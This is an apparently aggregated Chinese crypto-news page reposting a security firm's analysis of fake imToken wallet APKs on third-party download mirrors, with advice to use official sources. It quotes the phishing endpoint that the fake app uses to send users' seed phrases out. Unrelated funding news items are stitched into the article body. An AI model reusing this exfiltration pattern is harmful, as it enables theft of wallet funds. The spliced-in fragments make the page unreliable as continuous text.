比特幣交易所 比特幣交易所
Ctrl+D 比特幣交易所
ads
首頁 > Gate.io > Info

Web3 假錢包第三方源調查分析:如何甄別網絡釣魚攻擊?_APK

Author:

Time:1900/1/1 0:00:00

慢霧安全團隊建議使用錢包、交易所時請認準官方下載渠道并從多方進行驗證。

原文:https://foresightnews.pro/article/h5Detail/31716

作者:山&耀

轉自:ForesightNews

背景

基于區塊鏈技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。

當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包「登錄」;這與我們傳統意義上的「登錄」不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行「登錄」,我們可以看到「登錄」錢包時顯示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而錢包是你在Web3世界中的唯一通行證。

Game Storm Studios與Ready Games合作發布基于移動端的Web3游戲:7月7日消息,總部位于巴基斯坦的Game Storm Studios將與Ready Games合作推出兩款新的移動Web3游戲。Games Storm的新基于區塊鏈的游戲都將以寵物為主題。據其網站介紹,Game Storm在其10多年的運營中已經發布了1000多款非Web3游戲,并在巴基斯坦、美國、印度和迪拜設有辦事處。它主要專注于幫助游戲開發者創建適用于Android和iPhone的移動應用程序。

此前報道,游戲初創公司Ready Games通過代幣銷售完成300萬美元融資。Ready Games于5月開始進軍Web3。[2022/7/7 1:58:14]

俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

Web3技術公司Gripnr融資250萬美元,Sopris Capital等參投:4月17日消息,位于新奧爾良的Web3技術公司Gripnr宣布獲得250萬美元融資,Sopris Capital、XBTO Humla Ventures、Abstraction Ventures、Better Angels、Carl Sparks、Voodoo Ventures以及一系列位于新奧爾良的投資者參投。

目前,該公司計劃利用新融資發行其首款5E游戲和創世NFT系列《The Glimmering》,該NFT系列將于5月發布。

據悉,Gripnr是一家Web3技術公司,由Brent McCrossen創立。其目標是將桌游帶入區塊鏈。(TechSutram)[2022/4/18 14:30:07]

在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?

Web3應用Jambo獲得750萬美元種子輪融資:金色財經報道,非洲 Web 3 超級應用程序公司 Jambo從包括 Delphi Ventures、Coinbase Ventures 和 Three Arrows Capital 在內的加密行業的眾多知名支持者那里籌集了 750 萬美元的種子資金。超級應用程序是一站式移動應用程序,可提供多種服務,例如叫車、銀行、通信和食品配送。(Coindesk)[2022/2/21 10:06:29]

網站分析

鑒于下載途徑眾多,我們今天以apkcombo為例看看,apkcombo是一個第三方應用市場,它提供的應用據官方說大部分來源于其他正規應用商店,但事實是否真如官方所說呢?

我們先看下apkcombo的流量有多大:

Web3社交媒體平臺MattersLab完成200萬美元Pre-A輪融資,隆領投資參投:2月10日消息,Web3社交媒體平臺Matters Lab近期完成200萬美元Pre-A輪融資,隆領投資、ProtocolLabs、MaskNetwork、CrustNetwork、InfinityLabs、AssemblyPartners和IncubaAlpha等機構參投。

據悉,MattersLab于2018年成立,最初以“區塊鏈媒體實驗”聞名,首個產品為去中心化出版平臺Matters.news。2021年,該機構發布內容共創型NFT“Traveloggers”,并與香港文藝復興基金會合作舉辦第一季現場非小說寫作獎,以助寫作者創作紀錄片、調查報告,開展實地研究等。MattersLab計劃在今年發布基于HarbergerTax(哈伯格稅)理論的創作者DAO應用程序“TheSpace”。此外,新資金還將用于擴展合作及代幣化。[2022/2/10 9:42:54]

據數據統計站點similarweb統計,apkcombo站點:

星際大陸聯合創始人:Filecoin或分布式存儲所引領的Web3.0最終將替代中心化存儲:金色財經報道,在7月27日舉辦的《家里有礦 | 解析IPFS協議如何加速Web3.0》的直播節目中,星際大陸聯合創始人Calvin Cao表示,Filecoin作為IPFS的激勵層,如果沒有Filecoin,ipfs也就沒法發展起來,就像我們之前常常舉的例子一樣,滴滴如果沒有剛上線時候燒錢做市場補貼給司機或者乘客,現在也不會有現在的體量,filecoin如果想真正的做到商用必須要做到安全,穩定,便宜才可以吃掉中心化存儲的市場份額。Filecoin的通證激勵機制,可以實現最高效、最大范圍的硬件共享和資源優化配置,使得數據的存儲傳輸成本更低, 隨著整個網絡規模越來越大和數據時代的到來,Web2.0的網絡架構面臨越來越嚴重的挑戰,服務器節點的高度中心化、對骨干網絡的過度依賴、數據存儲全局低效,數據層的應用平臺數據泄露的風險和隱私侵犯,這些問題和挑戰的產生,來源于Web2.0相對于互聯網精神的背離。

Web3.0 IPFS的出現是大勢所趨也是時代的必然,Filecoin或分布式存儲所引領的Web3.0必將最終替代中心化存儲。而IPFS也是必然需要filecoin來真正完成的。[2020/7/27]

全球排名:1,809國家排名:7,370品類排名:168我們可以看到它的影響力和流量都非常大。它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:

那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:https://play.google.com/store/apps/details?id=im.token.app

由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。而apkcombo鏡像站的下載路徑為:https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo提供的版本為24.9.11,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。

在編寫本文時imToken錢包的最新版本為2.11.3,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。

如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:

錢包分析

在之前我們已經分析過不少假錢包的案例,如:2021-11-24我們披露:《慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。

我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>

看下圖,最早的「api.funnel.rocks」證書出現在2022-06-03,也就是攻擊開始的大概時間:

俗話說一圖勝千言,最后我們畫一個流程圖:

總結

目前這種騙局活動不僅活躍,甚至有擴大范圍的趨勢,每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節,應時刻保持懷疑之心,增強安全意識與風險意識,當你使用錢包、交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。

同時,如需使用錢包,請務必認準以下主流錢包App官方網址:

imToken錢包:https://token.im/TokenPocket錢包:https://www.tokenpocket.pro/TronLink錢包:https://www.tronlink.org/比特派錢包:https://bitpie.com/MetaMask錢包:https://metamask.io/TrustWallet:https://trustwallet.com/請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。

致謝:感謝在溯源過程中imToken官方提供的驗證支持。

由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

?

Tags:WEBWEB3COMAPKsuperwebusinessweb3游戲是什么意思LocoMetaMETAPK幣

Gate.io
多頭將在本周開啟反攻,哪些山寨幣會一騎絕塵?_MAC

上周,由于獲利了結,我們看到山寨幣價格下跌。大多數加密貨幣下跌了10-15%。然而,本周似乎看好XRP等幾種山寨幣,它們可能會結束與SEC的法律糾紛,并有望贏得勝利.

1900/1/1 0:00:00
狗狗幣(DOGE)預測:關鍵水平是上漲或下跌 24% 的關鍵_DOG

市場近期的不穩定加劇了預測狗狗幣價格的重要性。DOGE是一種基于流行互聯網模因的加密貨幣,由于億萬富翁企業家埃隆馬斯克對該資產的大力支持而受到廣泛關注.

1900/1/1 0:00:00
比特幣資金流入標志著早期牛市形成_比特幣

簡單來說比特幣每天實現利潤1.92億美元。實現上限通過樞軸點。市場調整表明多頭尚未完全控制局面。流入比特幣市場的資本已將其中的很大一部分轉回未實現的利潤.

1900/1/1 0:00:00
充滿爭議的比特幣Ordinals、比特幣跨鏈與BitcoinFi走向何方?_OIN

本文來自香港Web3嘉年華速記JeffreyHu:我是JeffreyHu,來自HashKeyCapital討論的話題是比特幣新興技術,因為現在有非常多的比特幣新熱點出來.

1900/1/1 0:00:00
BKEX 關于ETF專區新增STX3L、STX3S (Stacks)并開啟交易瓜分1,200USDT 活動的公告_USDT

尊敬的用戶: BKEXETF專區將于2023年4月28日15:00上線STX3L、STX3S,并同步開啟交易瓜分1,200USDT活動.

1900/1/1 0:00:00
分析師宣布:柴犬可能漲價 380%_SHI

流行的meme幣ShibaInu是市值排名前20的加密貨幣之一。SHIB團隊致力于持續的開發工作,并承擔了許多項目。因此,ShibaInu網絡通過達到關鍵基準和里程碑獲得了行業認可.

1900/1/1 0:00:00
ads